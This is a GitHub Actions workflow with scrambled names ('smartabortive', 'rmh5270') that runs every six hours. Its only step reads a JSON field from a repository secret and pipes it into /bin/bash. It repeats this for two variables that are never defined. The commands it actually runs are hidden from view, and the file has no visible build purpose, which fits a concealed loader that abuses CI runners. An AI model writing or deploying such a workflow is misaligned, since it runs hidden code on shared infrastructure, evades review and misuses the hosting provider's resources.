name: smartabortive
on:
  workflow_dispatch:
  schedule:
    - cron: '21 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: smartabortive
        env:
          rmh5270: ${{ secrets.rmh5270 }}
        run: |
          echo $rmh5270 | jq -r .yxel52 | /bin/bash
          echo $e506 | jq -r .f15694 | /bin/bash
          echo $wmq444 | jq -r .gir15 | /bin/bash

